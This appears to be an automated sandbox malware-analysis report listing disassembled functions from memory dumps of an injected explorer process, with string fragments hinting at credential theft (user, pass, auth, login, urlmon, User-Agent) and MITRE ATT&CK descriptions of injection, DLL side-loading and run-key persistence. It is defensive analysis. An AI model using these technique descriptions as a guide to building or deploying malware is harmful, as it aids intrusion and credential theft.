Instruction ID: da00b74241d56b3d57307d0d6b0b3213f6da0f29e155e47a3beb3ea2525babc9
Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction Fuzzy Hash: 19319E74218B484FC784EF2894D5BAAB7E1FFE8304F81462DA84ACB255DF34E945C752

Function 0E875FBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON

Download Yara Rule

Strings

.dll, xrefs: 0E875FFE
hild, xrefs: 0E875FF6
me_c, xrefs: 0E875FEE
chro, xrefs: 0E876023

Memory Dump Source

Source File: 00000008.00000002.3387480748.000000000E800000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e800000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction ID: b1162edcae0236661bf5e5d9d1bb1bf9bff7a56883292ac6ba81623cd4a21a04
Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction Fuzzy Hash: AF315E70218B188FC784EF688494BAAB7E1FFD8200F944A6D988EDB255DF30C9458753

Function 0E74E8C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

nt: , xrefs: 0E74E91E
on.d, xrefs: 0E74E902
urlmon.dll, xrefs: 0E74E959
User-Agent: , xrefs: 0E74E935, 0E74E948

Memory Dump Source

Source File: 00000008.00000002.3387267397.000000000E660000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e660000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: c4ec53e81d7eff98ef861fac6ecc55567da57294cf79fb495a96120d9a968466
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: BA31D171614A4D8FCB44EFA8C8887EDB7E0FB58214F40062AD85ED7360EF748A45C789

Function 0BE3A8C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

User-Agent: , xrefs: 0BE3A935, 0BE3A948
nt: , xrefs: 0BE3A91E
on.d, xrefs: 0BE3A902
urlmon.dll, xrefs: 0BE3A959

Memory Dump Source

Source File: 00000008.00000002.3383882525.000000000BD80000.00000040.80000000.00040000.00000000.sdmp, Offset: 0BD80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_bd80000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: 0da3374ed586132e3b72756e49087633af09dbc4f4714ce327836ddde9b81fdb
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: 4831D131614A4C8FCF04EFA8D8997EDBBE1FB58205F40522AD45EE7240DF748645C789

Function 1041A8C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

urlmon.dll, xrefs: 1041A959
nt: , xrefs: 1041A91E
on.d, xrefs: 1041A902
User-Agent: , xrefs: 1041A935, 1041A948

Memory Dump Source

Source File: 00000008.00000002.3388937443.0000000010370000.00000040.80000000.00040000.00000000.sdmp, Offset: 10370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10370000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: de776d1bcc34909f8233a27b066ea5c093435b0ef14faad4465e8483b3052f8a
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: 5E31D171714A4C8BCB44EFA8D8857EDB7E1FB68209F40022EE44ED7250DF78A685C789

Function 0E8788C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

nt: , xrefs: 0E87891E
on.d, xrefs: 0E878902
User-Agent: , xrefs: 0E878935, 0E878948
urlmon.dll, xrefs: 0E878959

Memory Dump Source

Source File: 00000008.00000002.3387480748.000000000E800000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e800000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: 6b281279bc4a491bee5a24719fa4b0c57ea347ea1cfd845c62def1a7c12c08d6
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: 1531A031614A1C8FCB45EFA9C8847EEBBE1FF58214F40462AD59ED7240DF748A45878A

Function 0E5AB8C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

on.d, xrefs: 0E5AB902
urlmon.dll, xrefs: 0E5AB959
User-Agent: , xrefs: 0E5AB935, 0E5AB948
nt: , xrefs: 0E5AB91E

Memory Dump Source

Source File: 00000008.00000002.3387086346.000000000E530000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e530000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: 23723c3dca386e36036f4c027abf7f8e4a1405097ca07bc3f0442285b508e3c0
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: 1E31D131A14A0D8FCB55EFA8C8847EEB7E0FB98204F400A2AD54ED7250EF748A45C799

Function 0E74E8BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

nt: , xrefs: 0E74E91E
on.d, xrefs: 0E74E902
urlmon.dll, xrefs: 0E74E959
User-Agent: , xrefs: 0E74E935, 0E74E948

Memory Dump Source

Source File: 00000008.00000002.3387267397.000000000E660000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e660000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: 1cc6d5c410074ffdba22fa78b1c628e1270a6156ab0a1ba41785085554fb3e65
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: BF21D571610A4D8FCB44EFA8C8487EDBBE1FF58204F40461AD85AD7360EF748A45CB85

Function 0BE3A8BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

User-Agent: , xrefs: 0BE3A935, 0BE3A948
nt: , xrefs: 0BE3A91E
on.d, xrefs: 0BE3A902
urlmon.dll, xrefs: 0BE3A959

Memory Dump Source

Source File: 00000008.00000002.3383882525.000000000BD80000.00000040.80000000.00040000.00000000.sdmp, Offset: 0BD80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_bd80000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: e43b6fd61f702cad1853661b8ff0c08fce8b507e7b9fc86fbbbff2196ae07c12
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: CF21B470A14A4C8FCF05EFA8D89A7EDBBE1FF58205F40522AD45AE7240DF748645C78A

Function 1041A8BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

urlmon.dll, xrefs: 1041A959
nt: , xrefs: 1041A91E
on.d, xrefs: 1041A902
User-Agent: , xrefs: 1041A935, 1041A948

Memory Dump Source

Source File: 00000008.00000002.3388937443.0000000010370000.00000040.80000000.00040000.00000000.sdmp, Offset: 10370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10370000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: 84fb4f7f242e7be606bb1110ce4793210f7d87d5c068f6cf9fda23def0636058
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: 4A21E674710A4C8BCB04EFA8D8857ED7BE1FF68209F40421EE45AD7250DF78A685C789

Function 0E8788BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

nt: , xrefs: 0E87891E
on.d, xrefs: 0E878902
User-Agent: , xrefs: 0E878935, 0E878948
urlmon.dll, xrefs: 0E878959

Memory Dump Source

Source File: 00000008.00000002.3387480748.000000000E800000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e800000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: d3ebdd565e52bafeb6e832e3017cf29732a62b9eeae7edfadb3d41289a0ceff9
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: D721B470614A5C8FCB05EFA9C8847EEBBE1FF58204F40462AE49AD7240DF74CA45C79A

Function 0E5AB8BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

on.d, xrefs: 0E5AB902
urlmon.dll, xrefs: 0E5AB959
User-Agent: , xrefs: 0E5AB935, 0E5AB948
nt: , xrefs: 0E5AB91E

Memory Dump Source

Source File: 00000008.00000002.3387086346.000000000E530000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e530000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: 67dca01fc482cd9e0c2676de2ebf2b2b014aead227ccad39de1622c75c0c74d4
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: F621D530A10A0D8FCB55EFA8C8947EE7BE0FF98204F404A1AD55AD7250EF748A45C795

Function 0E74FE94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

l, xrefs: 0E74FF26
., xrefs: 0E74FF1F
t, xrefs: 0E74FEF4
l, xrefs: 0E74FF03

Memory Dump Source

Source File: 00000008.00000002.3387267397.000000000E660000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e660000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction ID: 9044e3d244604d290a47341045961fd4362ff52b7f53757b8dd86069eb24ed14
Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction Fuzzy Hash: AD216D71A24B0E9BDB48EFA8D4487EDBBF1FB18304F504A2ED449D3710DBB499518B84

Function 0E74FE92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

l, xrefs: 0E74FF26
., xrefs: 0E74FF1F
t, xrefs: 0E74FEF4
l, xrefs: 0E74FF03

Memory Dump Source

Source File: 00000008.00000002.3387267397.000000000E660000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e660000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction ID: b03b4f88f6834a3f25add3eb2f7852a93ef8ec614aa9c53324f7293aa0dd6820
Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction Fuzzy Hash: 6B215E71A24B0E9BDB48EFA8D0487ADBAF1FB58304F50462ED449D3720D7B495518B84

Function 0BE3BE92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

., xrefs: 0BE3BF1F
t, xrefs: 0BE3BEF4
l, xrefs: 0BE3BF26
l, xrefs: 0BE3BF03

Memory Dump Source

Source File: 00000008.00000002.3383882525.000000000BD80000.00000040.80000000.00040000.00000000.sdmp, Offset: 0BD80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_bd80000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction ID: 43c3751e651a81315fa9ea4cc96ce1eab75f41a5c07d6b2eb8467c6435aa4de5
Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction Fuzzy Hash: 9F217770A24B0E9FDB08EFA8E0457AEBBF0FB18304F50562ED009E3600DB789591CB85

Function 0BE3BE94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

., xrefs: 0BE3BF1F
t, xrefs: 0BE3BEF4
l, xrefs: 0BE3BF26
l, xrefs: 0BE3BF03

Memory Dump Source

Source File: 00000008.00000002.3383882525.000000000BD80000.00000040.80000000.00040000.00000000.sdmp, Offset: 0BD80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_bd80000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction ID: c10c8e648fdf12a19667029abbc171c20f70c95f7d142ca6ebaa025646929498
Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction Fuzzy Hash: B9216970A24A0D9FDB08EFA8E4457EEBBF1FB18304F50562ED009E3600DB789595CB85

Function 1041BE92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

., xrefs: 1041BF1F
l, xrefs: 1041BF03
t, xrefs: 1041BEF4
l, xrefs: 1041BF26

Memory Dump Source

Source File: 00000008.00000002.3388937443.0000000010370000.00000040.80000000.00040000.00000000.sdmp, Offset: 10370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10370000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction ID: d2d4224a2cfc0e12f45f4c4ee1b509821298346581f938a4f3bcd81b30ffc5b7
Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction Fuzzy Hash: 7C215E78A24B0D9BDB44EFA8E0857ADBAF1FB68314F90462DE009D7610D778A591CB84

Function 1041BE94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

., xrefs: 1041BF1F
l, xrefs: 1041BF03
t, xrefs: 1041BEF4
l, xrefs: 1041BF26

Memory Dump Source

Source File: 00000008.00000002.3388937443.0000000010370000.00000040.80000000.00040000.00000000.sdmp, Offset: 10370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10370000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction ID: 368fcf5c50053e51fa50c4fb0914c07426f071554930fc31f58898ee1be0b860
Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction Fuzzy Hash: F1216078A24A0D9BDB44EFA8E0857EDBBF1FB18314F90462DE009D7610D778A591CB84

Function 0E879E94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

l, xrefs: 0E879F03
l, xrefs: 0E879F26
t, xrefs: 0E879EF4
., xrefs: 0E879F1F

Memory Dump Source

Source File: 00000008.00000002.3387480748.000000000E800000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e800000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction ID: 4e2d63b5925c2e3855896f845b5e461e4117d1eedcb37c261b2576e42a93ebd5
Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction Fuzzy Hash: 86216B70A24A0D9BDB08EFA8D0447EEBBF1FF58304F504A2ED189D3610DB74D9518B85

Function 0E879E92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

l, xrefs: 0E879F03
l, xrefs: 0E879F26
t, xrefs: 0E879EF4
., xrefs: 0E879F1F

Memory Dump Source

Source File: 00000008.00000002.3387480748.000000000E800000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e800000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction ID: a1721d334c5ce6270b70d70645bceff48325c66bfc6631e1b5a956b218883274
Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction Fuzzy Hash: 65215A70A24A0D9BDB48EFA8D0447AEBBF1FF58304F504A2ED189D3610DB74D9918B85

Function 0E5ACE92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

., xrefs: 0E5ACF1F
t, xrefs: 0E5ACEF4
l, xrefs: 0E5ACF03
l, xrefs: 0E5ACF26

Memory Dump Source

Source File: 00000008.00000002.3387086346.000000000E530000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e530000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction ID: d95c3ea2cd87725f7b0586b8e8188f94cb4669d16e3a5ae795a87ccf35bbcae4
Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction Fuzzy Hash: 37217A74A24A0E9FDB48EFA8C0447EEBBF1FB58300F504A2ED109E3610DB749991CB94

Function 0E5ACE94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

., xrefs: 0E5ACF1F
t, xrefs: 0E5ACEF4
l, xrefs: 0E5ACF03
l, xrefs: 0E5ACF26

Memory Dump Source

Source File: 00000008.00000002.3387086346.000000000E530000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e530000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction ID: 042cadc0773f1e1d3c716e25275a3de366b711b352ee9ea7cf6422bf247c87a1
Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction Fuzzy Hash: E0218B74A24A0E9FDB48EFA8C4447EEBBF1FB58300F504A2ED109E3610DB749952CB94

Function 0E74FFF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON

Download Yara Rule

Strings

logi, xrefs: 0E75003C
user, xrefs: 0E750015
auth, xrefs: 0E75002F
pass, xrefs: 0E750022

Memory Dump Source

Source File: 00000008.00000002.3387267397.000000000E660000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e660000_explorer.jbxd

Similarity

API ID:
String ID: auth$logi$pass$user
API String ID: 0-2393853802
Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction ID: f1cad7542e856efa550b62ad5e0fef16c1f78623d76a82d63ace8c0ffdce1e88
Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction Fuzzy Hash: FC21C071614B0D8BCB45DF9998906EEB7E2EF88344F004A19D80ADB354D7B0D9558BC2

Function 0BE3BFF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON

Download Yara Rule

Strings

auth, xrefs: 0BE3C02F
logi, xrefs: 0BE3C03C
pass, xrefs: 0BE3C022
user, xrefs: 0BE3C015

Memory Dump Source

Source File: 00000008.00000002.3383882525.000000000BD80000.00000040.80000000.00040000.00000000.sdmp, Offset: 0BD80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_bd80000_explorer.jbxd

Similarity

API ID:
String ID: auth$logi$pass$user
API String ID: 0-2393853802
Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction ID: 4fa80357b4f0007742d969e1bae68722ba587f2a4da1ec61df3574e8851ca847
Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction Fuzzy Hash: 2E21CD70614B0D8BCF05DF9A98816EEBBF1EF88344F006619E40AEB344DBB0D9548BC6

Function 1041BFF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON

Download Yara Rule

Strings

auth, xrefs: 1041C02F
user, xrefs: 1041C015
logi, xrefs: 1041C03C
pass, xrefs: 1041C022

Memory Dump Source

Source File: 00000008.00000002.3388937443.0000000010370000.00000040.80000000.00040000.00000000.sdmp, Offset: 10370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10370000_explorer.jbxd

Similarity

API ID:
String ID: auth$logi$pass$user
API String ID: 0-2393853802
Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction ID: 9c97278ebac7d4a30d0beaaf1863b91308e651a5665b6f6a683345f3539eb0f1
Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction Fuzzy Hash: EB21CD70614B0D8BCB45CF9AA8816DEB7E1EF88344F004659E40AEB354D7B4E9548BD6

Function 0E879FF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON

Download Yara Rule

Strings

pass, xrefs: 0E87A022
logi, xrefs: 0E87A03C
user, xrefs: 0E87A015
auth, xrefs: 0E87A02F

Memory Dump Source

Source File: 00000008.00000002.3387480748.000000000E800000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e800000_explorer.jbxd

Similarity

API ID:
String ID: auth$logi$pass$user
API String ID: 0-2393853802
Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction ID: 9231efecdc6fef4ac8fb25da190da978e2ecbdc30d39fcf5f74ea9bd4e99f52b
Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction Fuzzy Hash: 1821C030628B0D8BCB05DF9D98906EEB7E1EF88344F044A19D44ADB284D7B1D9148BC2

Function 0E5ACFF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON

Download Yara Rule

Strings

user, xrefs: 0E5AD015
pass, xrefs: 0E5AD022
logi, xrefs: 0E5AD03C
auth, xrefs: 0E5AD02F

Memory Dump Source

Source File: 00000008.00000002.3387086346.000000000E530000.00000040.80000000.00040000.00000000.sdmp, Offset: 0E530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_e530000_explorer.jbxd

Similarity

API ID:
String ID: auth$logi$pass$user
API String ID: 0-2393853802
Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction ID: 1fb7d5a4660ba7a207c1a1c87b0b1adb1f8e804022cfeb94eebff802c919984d
Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction Fuzzy Hash: AE21F030614B0D8BCB01DF9998812EEB7F1FFC8344F044A19D40ADB215E7B0D9418BC2

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
